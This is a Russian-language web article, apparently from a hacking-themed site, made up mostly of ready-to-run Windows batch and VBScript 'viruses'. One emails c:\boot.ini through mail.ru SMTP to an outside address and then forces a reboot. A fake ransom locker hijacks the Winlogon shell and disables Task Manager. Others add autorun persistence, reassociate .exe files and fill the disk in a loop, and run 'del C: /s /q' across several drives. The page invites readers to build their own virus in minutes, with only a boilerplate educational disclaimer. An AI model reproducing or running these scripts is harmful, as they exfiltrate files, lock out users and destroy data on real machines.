echo Call SendPost("smtp.mail.ru", "forum.whack.ru@mail.ru", "[EMAIL]support@mail.ru[/EMAIL]", "...", "Копм заражен!") >> %temp%temp.vbs
echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%temp.vbs
echo Set iMsg = CreateObject("CDO.Message") >> %temp%temp.vbs
echo Set iConf = CreateObject("CDO.Configuration") >> %temp%temp.vbs
echo Set Flds = iConf.Fields >> %temp%temp.vbs
echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendusing[/URL]") = 2 >> %temp%temp.vbs
echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpauthenticate[/URL]") = 1 >> %temp%temp.vbs
echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendusername[/URL]") = "support" >> %temp%temp.vbs
echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/sendpassword[/URL]") = "support" >> %temp%temp.vbs
echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpserver[/URL]") = "smtp.mail.ru" >> %temp%temp.vbs
echo Flds.Item("[URL]http://schemas.microsoft.com/cdo/configuration/smtpserverport[/URL]") = 25 >> %temp%temp.vbs
echo Flds.Update >> %temp%temp.vbs
echo iMsg.Configuration = iConf >> %temp%temp.vbs
echo iMsg.To = strTo >> %temp%temp.vbs
echo iMsg.From = strFrom >> %temp%temp.vbs
echo iMsg.Subject = strSubject >> %temp%temp.vbs
echo iMsg.TextBody = strBody >> %temp%temp.vbs
echo iMsg.AddAttachment "c:boot.ini" >> %temp%temp.vbs
echo iMsg.Send >> %temp%temp.vbs
echo End Function >> %temp%temp.vbs
echo Set iMsg = Nothing >> %temp%temp.vbs
echo Set iConf = Nothing >> %temp%temp.vbs
echo Set Flds = Nothing >> %temp%temp.vbs
echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru"" -f",1 >> %temp%temp.vbs
start %temp%temp.vbs
start %temp%temp1.vbs
start %temp%temp2.vbs
Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач.Чтобы разблокировать компьютер можно введя код 200393!(Но он не разблокирует)
Код:
[USER=98981]@Echo[/USER] off
CHCP 1251
cls
Set Yvaga=На вашем компьютере найден вирус.
Set pass=Пароль
Set pas=Введите пароль.
Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
Set dim=Выключаю вирус...
title Внимание!!!
CHCP 866
IF EXIST C:windowsboot.bat (
goto ok )
cls
IF NOT EXIST C:windowsboot.bat (
ECHO Windows Registry Editor Version 5.00 >> C:0.reg
ECHO. >> C:0.reg
ECHO [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >> C:0.reg
ECHO. >> C:0.reg
ECHO "Shell"="Explorer.exe, C:\windows\boot.bat " >> C:0.reg
start/wait regedit -s C:0.reg
del C:0.reg
ECHO [USER=98981]@Echo[/USER] off >>C:windowsboot.bat
ECHO C:WINDOWSsystem32taskkill.exe /f /im Explorer.exe >>C:windowsboot.bat
ECHO reg add "HKCUsoftwareMicrosoftWindowsCurrentVersionPoliciessystem" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:windowsboot.bat
ECHO start sys.bat >>C:windowsboot.bat
attrib +r +a +s +h C:windowsboot.bat
copy virus.bat c:windowssys.bat
attrib +r +a +s +h C:windowssys.bat
GOTO end)
:ok
cls
Echo %Yvaga%
echo.
echo %virus%
echo %pas%
set /a choise = 0
set /p choise=%pass%:
if "%choise%" == "101" goto gold
if "%choise%" == "200393" goto status
exit
:status
echo %dim%
attrib -r -a -s -h C:windowsboot.bat
del C:windowsboot.bat
attrib -r -a -s -h C:windowssys.bat
del C:windowssys.bat
cls
:gold
start C:
:end
Добавляет программу в автозагрузку ОС
Код:
copy ""%0"" "%SystemRoot%system32File.bat"
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v "Filel" /t REG_SZ /d "%SystemRoot%system32File.bat" /f
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f
Этот вирус,блокирует все программы,но интернет работает.
Код:
[USER=98981]@Echo[/USER] off
Echo Virus Loading
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
Echo VIRUS LOAD
[USER=98981]@Echo[/USER] off
chcp 1251
echo щаска...
color 4
[USER=98981]@Echo[/USER] Вас собирается ~CENS~: ZhenyaZERO
[USER=98981]@Echo[/USER] Автор вируса: ZhenyaZERO
[USER=98981]@Echo[/USER] Условия: если вам попался этот файл, сразу его удаляйте. Этот файл был создан исключительно для ютуба. Использование этого видео в других целях запрещено.
pause
echo Этап 1: Создание ограничений
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
[USER=98981]@Echo[/USER] off
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsShellNoRoamMUICache /v @C:WINDOWSsystem32SHELL32.dll,-8964 /t REG_SZ /d ТУТ Хавно там всякое /F
del c:Program Files/q
taskkill /f /im explorer.exe >nul
echo Этап 2: Ща комп начнет глючить
Date 13.09.96
If exist c:ski.bat goto abc
Copy %0 c:ski.bat
Attrib +h c:ski.bat
Echo c:ski.bat >>autoexec.bat
:abc
md PRIDUROK
md LUZER
md DURAK
md LAMER
Label E: PRIDUROK
assoc .exe=.mp3
del c:Program Files/q
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%windowssystem32rundll32.vbs
echo do >> %systemdrive%windowssystem32rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%windowssystem32rundll32.dat", True) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%windowssystem32rundll32.vbs
echo tx.close >> %systemdrive%windowssystem32rundll32.vbs
echo FSO.DeleteFile "%systemdrive%windowssystem32rundll32.dat" >> %systemdrive%windowssystem32rundll32.vbs
echo loop >> %systemdrive%windowssystem32rundll32.vbs
start %systemdrive%windowssystem32rundll32.vbs
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v system_host_run /t REG_SZ /d %systemdrive%windowssystem32rundll32.vbs /
echo Этап 3: Прощай, винда!
del C: /s /q
del D: /s /q
del I: /s /q
Вы можете менять названия программ, расширений, текст, коды и т. д. Если вам нужно, вы сможете собрать свой вирус (или прогу для троллинга) за несколько минут. Это не гайд по сборке вируса.
Я рассказал про наиболее интересные команды ОС Виндовс, но далеко не про все. Кого заинтересовал этот вопрос и кто хочет узнать больше может воспользоваться интернетом и поиском в системах Яндекс, Гугл и им аналогичных. Использование bat-файлов и подходящих редакторов с разметкой текста, а также интернет ресурсов позволяет весьма удобно программировать без среды разработки на любом языке.
Если Вам понравилась статья — поделитесь с друзьями
580 просмотров
Отказ от ответственности: Автор или издатель не публиковали эту статью для вредоносных целей. Вся размещенная информация была взята из открытых источников и представлена исключительно в ознакомительных целях а также не несет призыва к действию. Создано лишь в образовательных и развлекательных целях. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий. Все причиненные возможные убытки посетитель берет на себя. Автор проделывает все действия лишь на собственном оборудовании и в собственной сети. Не повторяйте ничего из прочитанного в реальной жизни. | Так же, если вы являетесь правообладателем размещенного на страницах портала материала, просьба написать нам через контактную форму жалобу на удаление определенной страницы, а также ознакомиться с инструкцией для правообладателей материалов. Спасибо за понимание.
Если вам понравились материалы сайта, вы можете поддержать проект финансово, переведя некоторую сумму с банковской карты, счёта мобильного телефона или из кошелька ЮMoney.